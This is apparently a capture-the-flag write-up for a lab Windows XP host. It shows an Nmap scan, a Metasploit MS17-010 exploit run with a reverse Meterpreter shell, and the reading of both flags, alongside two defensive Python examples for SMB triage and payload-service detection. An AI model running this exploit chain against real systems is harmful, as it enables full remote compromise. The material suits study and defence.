I started by running Nmap against the host to discover the running services:
```
# Nmap 7.80 scan initiated Tue Sep 15 14:12:48 2020 as: nmap -O -sV -sC -p- -oN scan 10.10.10.4
Nmap scan report for 10.10.10.4
Host is up (0.019s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (94%), General Dynamics embedded (88%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows XP (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows 2000 SP4 (91%), Microsoft Windows XP SP2 or Windows Server 2003 (91%), Microsoft Windows Server 2003 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 (90%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h29m49s, deviation: 2h07m16s, median: 4d22h59m49s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:df:de (VMware)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2020-09-20T23:14:42+03:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Sep 15 14:15:43 2020 -- 1 IP address (1 host up) scanned in 175.19 seconds
```
From this output we can see that two ports are open, 139 and 445, and that the SMB discovery scripts ran against the service (note that `smb-security-mode` reports message signing as disabled), although there were no SMB shares.
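The facts that matter in that scan (SMB reachable, an end-of-life OS reported by `smb-os-discovery`, message signing disabled) are easy to miss in a wall of Nmap output. The following is an added example, not part of the original writeup, that parses Nmap's normal (`-oN`) output format and turns those three observations into triage findings. The sample scan text is constructed to mirror the scan above, and the `HostReport`, `parse_nmap_normal` and `assess_smb_exposure` names are my own.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in Nmap "normal" (-oN) output format, modelled on the
# scan in the writeup; it is not the writeup's own scan file.
SAMPLE_SCAN = """\
# Nmap 7.80 scan initiated Tue Sep 15 14:12:48 2020 as: nmap -O -sV -sC -p- -oN scan 10.10.10.4
Nmap scan report for 10.10.10.4
Host is up (0.019s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (92%)
Host script results:
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Computer name: legacy
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
# Nmap done at Tue Sep 15 14:15:43 2020 -- 1 IP address (1 host up) scanned in 175.19 seconds
"""

# Windows versions that no longer receive regular security updates.
END_OF_LIFE_OS = ("Windows 2000", "Windows XP", "Windows Server 2003")

PORT_RE = re.compile(r"^(\d+/(?:tcp|udp))\s+(\w+)\s+(\S+)(?:\s+(.*))?$")
SCRIPT_HEADER_RE = re.compile(r"^\|_?\s*([\w-]+):\s*$")      # "| smb-os-discovery:"
SCRIPT_KV_RE = re.compile(r"^\|_?\s+([^:]+?):\s+(.*)$")      # "|   OS: Windows XP ..."


@dataclass
class HostReport:
    host: str = ""
    open_ports: dict = field(default_factory=dict)   # "445/tcp" -> (service, version)
    os_guesses: list = field(default_factory=list)
    smb_os: str = ""
    message_signing: str = ""


def parse_nmap_normal(text):
    """Extract host, open ports, OS guesses and the two SMB script results we care about."""
    report = HostReport()
    current_script = None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = re.match(r"^Nmap scan report for (\S+)", line)
        if m:
            report.host = m.group(1)
            continue
        if line.startswith("Aggressive OS guesses:"):
            guesses = line.split(":", 1)[1]
            report.os_guesses = [g.strip() for g in guesses.split(",")]
            continue
        m = PORT_RE.match(line)
        if m:
            port, state, service, version = m.groups()
            if state == "open":
                report.open_ports[port] = (service, version or "")
            continue
        m = SCRIPT_HEADER_RE.match(line)
        if m:
            current_script = m.group(1)   # remember which NSE script the next lines belong to
            continue
        m = SCRIPT_KV_RE.match(line)
        if m and current_script:
            key, value = m.group(1).strip(), m.group(2).strip()
            if current_script == "smb-os-discovery" and key == "OS":
                report.smb_os = value
            elif current_script == "smb-security-mode" and key == "message_signing":
                report.message_signing = value.split()[0]   # "disabled (dangerous, ...)" -> "disabled"
    return report


def assess_smb_exposure(report):
    """Return (severity, message) findings for an SMB host, from a defender's point of view."""
    findings = []
    smb_ports = [p for p in ("139/tcp", "445/tcp") if p in report.open_ports]
    if not smb_ports:
        return findings
    findings.append(("medium", f"{report.host}: SMB reachable on {', '.join(smb_ports)}"))
    # Only look at the part before "(" so "Windows XP (Windows 2000 LAN Manager)" maps to XP.
    product = report.smb_os.split("(")[0]
    eol = next((o for o in END_OF_LIFE_OS if o in product), None)
    if eol:
        findings.append(("critical", f"{report.host}: SMB served by end-of-life {eol}; "
                                     "confirm MS17-010 is applied or isolate the host"))
    if report.message_signing.lower() == "disabled":
        findings.append(("high", f"{report.host}: SMB message signing disabled; "
                                 "require signing to prevent relay and tampering"))
    return findings


if __name__ == "__main__":
    for severity, msg in assess_smb_exposure(parse_nmap_normal(SAMPLE_SCAN)):
        print(f"[{severity.upper():8}] {msg}")
```

Pointed at a directory of real `-oN` files this gives an inventory of SMB hosts ranked by the same three signals the scan above exposes, which is what a patch or isolation decision for a Legacy-style host hinges on.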
EternalBlue (MS17-010) is one of the more common exploits for SMB, especially given that the OS is Windows XP. I started Metasploit, loaded the MS17-010 psexec module and ran it:
```
msf5 > use windows/smb/ms17_010_psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 10.10.10.4
rhost => 10.10.10.4
msf5 exploit(windows/smb/ms17_010_psexec) > set lhost 10.10.14.16
lhost => 10.10.14.16
msf5 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 10.10.14.16:4444
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 - 	[*] Preparing dynamite...
[*] 10.10.10.4:445 - 		[*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 - 	[+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 - 	[+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x82256da8
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... KpPkSPCi.exe
[*] 10.10.10.4:445 - Created \KpPkSPCi.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (176195 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \KpPkSPCi.exe...
[*] Meterpreter session 1 opened (10.10.14.16:4444 -> 10.10.10.4:1033) at 2020-09-15 15:26:50 -0400

meterpreter >
meterpreter > cd /
meterpreter > ls
Listing: C:\
============

Mode                Size               Type  Last modified                     Name
----                ----               ----  -------------                     ----
100777/rwxrwxrwx    0                  fil   2017-03-16 01:30:44 -0400         AUTOEXEC.BAT
100666/rw-rw-rw-    0                  fil   2017-03-16 01:30:44 -0400         CONFIG.SYS
40777/rwxrwxrwx     0                  dir   2017-03-16 01:20:29 -0400         Documents and Settings
100444/r--r--r--    0                  fil   2017-03-16 01:30:44 -0400         IO.SYS
100444/r--r--r--    0                  fil   2017-03-16 01:30:44 -0400         MSDOS.SYS
100555/r-xr-xr-x    47564              fil   2008-04-13 16:13:04 -0400         NTDETECT.COM
40555/r-xr-xr-x     0                  dir   2017-03-16 01:20:57 -0400         Program Files
40777/rwxrwxrwx     0                  dir   2017-03-16 01:20:30 -0400         System Volume Information
40777/rwxrwxrwx     0                  dir   2017-03-16 01:18:34 -0400         WINDOWS
100666/rw-rw-rw-    211                fil   2017-03-16 01:20:02 -0400         boot.ini
100444/r--r--r--    250048             fil   2008-04-13 18:01:44 -0400         ntldr
60401544/r-xr--r--  48691528838709231  fif   1551977431-11-15 22:18:24 -0500   pagefile.sys
100666/rw-rw-rw-    0                  fil   2020-09-20 17:03:03 -0400         pwned.txt

meterpreter > cd Documents\ and\ Settings
meterpreter > ls
Listing: C:\Documents and Settings
==================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   0     dir   2017-03-16 02:07:20 -0400  Administrator
40777/rwxrwxrwx   0     dir   2017-03-16 01:20:29 -0400  All Users
40777/rwxrwxrwx   0     dir   2017-03-16 01:20:29 -0400  Default User
40777/rwxrwxrwx   0     dir   2017-03-16 01:32:52 -0400  LocalService
40777/rwxrwxrwx   0     dir   2017-03-16 01:32:42 -0400  NetworkService
40777/rwxrwxrwx   0     dir   2017-03-16 01:33:41 -0400  john

meterpreter > cd john
meterpreter > ls
Listing: C:\Documents and Settings\john
=======================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40555/r-xr-xr-x   0       dir   2017-03-16 01:33:41 -0400  Application Data
40777/rwxrwxrwx   0       dir   2017-03-16 01:33:41 -0400  Cookies
40777/rwxrwxrwx   0       dir   2017-03-16 01:33:41 -0400  Desktop
40555/r-xr-xr-x   0       dir   2017-03-16 01:33:41 -0400  Favorites
40777/rwxrwxrwx   0       dir   2017-03-16 01:33:41 -0400  Local Settings
40555/r-xr-xr-x   0       dir   2017-03-16 01:33:41 -0400  My Documents
100666/rw-rw-rw-  524288  fil   2017-03-16 01:33:41 -0400  NTUSER.DAT
100666/rw-rw-rw-  1024    fil   2017-03-16 01:33:41 -0400  NTUSER.DAT.LOG
40777/rwxrwxrwx   0       dir   2017-03-16 01:33:41 -0400  NetHood
40777/rwxrwxrwx   0       dir   2017-03-16 01:33:41 -0400  PrintHood
40555/r-xr-xr-x   0       dir   2017-03-16 01:33:41 -0400  Recent
40555/r-xr-xr-x   0       dir   2017-03-16 01:33:41 -0400  SendTo
40555/r-xr-xr-x   0       dir   2017-03-16 01:33:41 -0400  Start Menu
40777/rwxrwxrwx   0       dir   2017-03-16 01:33:41 -0400  Templates
100666/rw-rw-rw-  178     fil   2017-03-16 01:33:42 -0400  ntuser.ini

meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Documents and Settings\john\Desktop
===============================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 02:19:32 -0400  user.txt

meterpreter > cat user.txt
[REDACTED]
meterpreter >
```
From this output you can see that the exploit ran successfully and I was given a Meterpreter shell, which the module reports as a SYSTEM session. From that shell I was able to browse to the Desktop of the john user and read the user flag.
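For a defender, the most useful part of that module output is the host-side trail it leaves: a payload with a random eight-letter name is written to the machine, a service is started to run it, and the file is deleted again once the stage is sent. On Windows every service installation is recorded in the System log as Event ID 7045, so that trail can be hunted even after the binary is gone. The following is an added example, not part of the writeup or of Metasploit, that runs a simple heuristic over constructed 7045 events. It assumes the events have already been split into fields the way a SIEM export presents them, and it assumes the payload is written under `%SystemRoot%` (the ADMIN$ share); the writeup only shows `\KpPkSPCi.exe`, so the exact path on the target is my assumption. `service_binary`, `looks_random`, `flag_service_install` and `detect_suspicious_service_installs` are my own names.

```python
import re

# Constructed sample of System-log service-installation events (Event ID 7045),
# already split into fields as a SIEM export would present them. The first event
# mirrors the artefacts visible in the module output; the others are benign filler.
SAMPLE_EVENTS = [
    {"time": "2020-09-15T15:26:48", "host": "LEGACY", "service_name": "KpPkSPCi",
     "image_path": "%SystemRoot%\\KpPkSPCi.exe", "account": "LocalSystem"},
    {"time": "2020-09-15T15:26:50", "host": "LEGACY", "service_name": "VMTools",
     "image_path": "\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\"",
     "account": "LocalSystem"},
    {"time": "2020-09-15T15:27:10", "host": "LEGACY", "service_name": "gupdate",
     "image_path": "\"C:\\Program Files\\Google\\Update\\GoogleUpdate.exe\" /svc",
     "account": "LocalSystem"},
]

RANDOM_NAME_RE = re.compile(r"^[A-Za-z]{8}$")

# Locations where a dropped service binary is suspicious: the Windows directory
# itself (ADMIN$), a drive root (C$) or a bare share-relative path, rather than a
# proper application subdirectory. Lower-cased because Windows paths are case-insensitive.
ROOT_DIRS = ("%systemroot%", "c:\\windows", "c:", "")


def service_binary(image_path):
    """Return (directory, file name) from a 7045 ImagePath, dropping quotes and arguments."""
    p = image_path.strip()
    if p.startswith('"'):
        p = p[1:].split('"', 1)[0]          # quoted path: take everything up to the closing quote
    else:
        p = p.split(" ", 1)[0]              # unquoted path: arguments follow the first space
    directory, _, fname = p.rpartition("\\")
    return directory.lower(), fname


def looks_random(name):
    """Heuristic: eight letters of mixed case, the shape of the payload name in the writeup."""
    return (bool(RANDOM_NAME_RE.match(name))
            and any(c.isupper() for c in name)
            and any(c.islower() for c in name))


def flag_service_install(event):
    """Return the reasons a single 7045 event looks like a dropped-and-run payload service.

    Two or more independent signals are required before the event is flagged, so a
    legitimate eight-letter service name in Program Files does not trip the rule."""
    directory, fname = service_binary(event["image_path"])
    stem, _, ext = fname.rpartition(".")
    reasons = []
    if ext.lower() == "exe" and looks_random(stem):
        reasons.append("random eight-letter binary name")
    if directory in ROOT_DIRS:
        reasons.append("binary placed directly in a system or share root")
    if stem and stem == event["service_name"]:
        reasons.append("service name identical to binary name")
    return reasons if len(reasons) >= 2 else []


def detect_suspicious_service_installs(events):
    """Run the heuristic over a list of 7045 events and return one alert per hit."""
    alerts = []
    for ev in events:
        reasons = flag_service_install(ev)
        if reasons:
            alerts.append({"host": ev["host"], "time": ev["time"],
                           "service": ev["service_name"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_suspicious_service_installs(SAMPLE_EVENTS):
        print(f"{alert['time']} {alert['host']} service={alert['service']}: "
              + "; ".join(alert["reasons"]))
```

Because the module deletes the payload after the stage is sent, the 7045 record (and the matching service-start entry) is often the only durable evidence on a host that lacks file-creation auditing; correlating it with an inbound SMB connection to port 445 at the same timestamp turns this heuristic into a reasonably confident detection.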
Since the session was already running as SYSTEM, I next browsed to the Administrator desktop, which worked just as well and allowed me to capture the root flag:
```
meterpreter > cd /
meterpreter > ls
Listing: C:\
============

Mode                Size               Type  Last modified                     Name
----                ----               ----  -------------                     ----
100777/rwxrwxrwx    0                  fil   2017-03-16 01:30:44 -0400         AUTOEXEC.BAT
100666/rw-rw-rw-    0                  fil   2017-03-16 01:30:44 -0400         CONFIG.SYS
40777/rwxrwxrwx     0                  dir   2017-03-16 01:20:29 -0400         Documents and Settings
100444/r--r--r--    0                  fil   2017-03-16 01:30:44 -0400         IO.SYS
100444/r--r--r--    0                  fil   2017-03-16 01:30:44 -0400         MSDOS.SYS
100555/r-xr-xr-x    47564              fil   2008-04-13 16:13:04 -0400         NTDETECT.COM
40555/r-xr-xr-x     0                  dir   2017-03-16 01:20:57 -0400         Program Files
40777/rwxrwxrwx     0                  dir   2017-03-16 01:20:30 -0400         System Volume Information
40777/rwxrwxrwx     0                  dir   2017-03-16 01:18:34 -0400         WINDOWS
100666/rw-rw-rw-    211                fil   2017-03-16 01:20:02 -0400         boot.ini
100444/r--r--r--    250048             fil   2008-04-13 18:01:44 -0400         ntldr
60401544/r-xr--r--  48691528838709231  fif   1551977431-11-15 22:18:24 -0500   pagefile.sys
100666/rw-rw-rw-    0                  fil   2020-09-20 17:03:03 -0400         pwned.txt

meterpreter > cd Documents\ and\ Settings
meterpreter > ls
Listing: C:\Documents and Settings
==================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   0     dir   2017-03-16 02:07:20 -0400  Administrator
40777/rwxrwxrwx   0     dir   2017-03-16 01:20:29 -0400  All Users
40777/rwxrwxrwx   0     dir   2017-03-16 01:20:29 -0400  Default User
40777/rwxrwxrwx   0     dir   2017-03-16 01:32:52 -0400  LocalService
40777/rwxrwxrwx   0     dir   2017-03-16 01:32:42 -0400  NetworkService
40777/rwxrwxrwx   0     dir   2017-03-16 01:33:41 -0400  john

meterpreter > cd Administrator
meterpreter > ls
Listing: C:\Documents and Settings\Administrator
================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40555/r-xr-xr-x   0       dir   2017-03-16 02:07:20 -0400  Application Data
40777/rwxrwxrwx   0       dir   2017-03-16 02:07:20 -0400  Cookies
40777/rwxrwxrwx   0       dir   2017-03-16 02:07:20 -0400  Desktop
40555/r-xr-xr-x   0       dir   2017-03-16 02:07:20 -0400  Favorites
40777/rwxrwxrwx   0       dir   2017-03-16 02:07:20 -0400  Local Settings
40555/r-xr-xr-x   0       dir   2017-03-16 02:07:20 -0400  My Documents
100666/rw-rw-rw-  786432  fil   2017-03-16 02:07:20 -0400  NTUSER.DAT
100666/rw-rw-rw-  1024    fil   2017-03-16 02:07:20 -0400  NTUSER.DAT.LOG
40777/rwxrwxrwx   0       dir   2017-03-16 02:07:20 -0400  NetHood
40777/rwxrwxrwx   0       dir   2017-03-16 02:07:20 -0400  PrintHood
40555/r-xr-xr-x   0       dir   2017-03-16 02:07:20 -0400  Recent
40555/r-xr-xr-x   0       dir   2017-03-16 02:07:20 -0400  SendTo
40555/r-xr-xr-x   0       dir   2017-03-16 02:07:20 -0400  Start Menu
40777/rwxrwxrwx   0       dir   2017-03-16 02:07:20 -0400  Templates
100666/rw-rw-rw-  178     fil   2017-03-16 02:07:21 -0400  ntuser.ini

meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 02:18:19 -0400  root.txt

meterpreter > cat root.txt
[REDACTED]
meterpreter >
```